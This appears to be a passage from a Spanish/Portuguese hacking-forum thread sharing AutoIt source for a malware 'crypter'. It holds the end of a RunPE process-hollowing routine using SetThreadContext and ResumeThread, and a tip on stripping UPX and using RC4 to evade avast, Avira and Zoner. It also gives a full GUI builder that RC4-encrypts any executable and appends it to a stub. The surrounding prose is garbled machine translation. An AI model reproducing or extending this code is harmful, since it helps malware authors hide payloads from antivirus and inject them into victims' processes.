"dword*", 0) EndIf $Lgfaklwgfa2PPOINTER += 40 Next DllStructSetData($Lgfaklwgfa2TCONTEXT, "Eax", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IENTRYPOINTNEW) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT)) $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $Lgfaklwgfa2HTHREAD) EndFunc Los buenos amigos son algunas maneras de final ir simple de la AVS: Zoner-- Código: Seleccionar todo ShellExecuteWait(@Scriptdir & "\upx.exe", '-d stub.exe', @scripdir &'\','open',@SW_HIDE) Para eliminar avast y avira asiento con la cabeza RC4 cifrar y RunPE Una vez que quede claro que este post es de mi total de Altor
  9. Cliente Gui Clasy Queda

    >#Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_icon=123.ico #AutoIt3Wrapper_UseUpx=n #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include #include #include #include #include #include #include #Region ### START Koda GUI section ### Form= $MainGui = _MakeGUI(@ScriptDir&"\bg.png", "Classic crypter", 1, 200) $Input1 = GUICtrlCreateInput("", 370, 140, 200, 21) $Button1 = GUICtrlCreateButton("Abrir", 575, 140, 65, 24) $Button2 = GUICtrlCreateButton("Cryptar", 640, 140, 65, 25, $WS_GROUP) $Button3 = GUICtrlCreateButton("About", 705, 140, 65, 25, $WS_GROUP) $Checkbox2 = GUICtrlCreateCheckbox("", 705, 100, 12, 12) #EndRegion ### END Koda GUI section ### GUICtrlSetOnEvent($Button1,"abrir") GuiCtrlSetOnevent($Button2, "Encryptar") FileInstall("bg.png" ,@ScriptDir&"\bg.png") ; Copia a imagen da forma principal para o local determinado Func Abrir() GUICtrlSetData($Input1, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*)")) If GUICtrlRead($Input1) = "" Then Return ;Retorna o estado anterior da Imput se o arquivo não for selecionado EndFunc Func Encryptar() WinSetOnTop($MainGui, "", 0) If GuiCtrlRead($Input1) = "" Then Return ; Condição que retorna se a Input1 não estiver preenchida $Stub = FileOpen(@ScriptDir&"\Stub.exe", 16) $File = FileOpen(GuiCtrlRead($Input1), 16) $s = FileRead($Stub) $f = FileRead($File) $f = _RC4($f, "MASDoAMOSdoAMODmoiAMOISDmoiAIOSDioAIOIOSxASKOxKOAKSFADAWdOIAWfoajeofjAJEjJUAFjAJOEjoA") $save = FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe" $abri = FileOpen($save, 18) FileWrite($abri, $s) FileWrite($abri, StringToBinary("ASJdAEjfAJfjASOdAOIDmioAMIOSDoAEMOmoFAOMEOiFJIAJSdjoiRvBAIOSDjioAJIOdeAEJIOdjioAdejOAdeJIAEd")) FileWrite($abri, $f) FileClose($Stub) Fileclose($File) Fileclose($abri) Fileclose($abri) FileClose($Input1) MsgBox(64, "", "Encryptado com sucesso") EndFunc While 1 Sleep(1) WEnd
×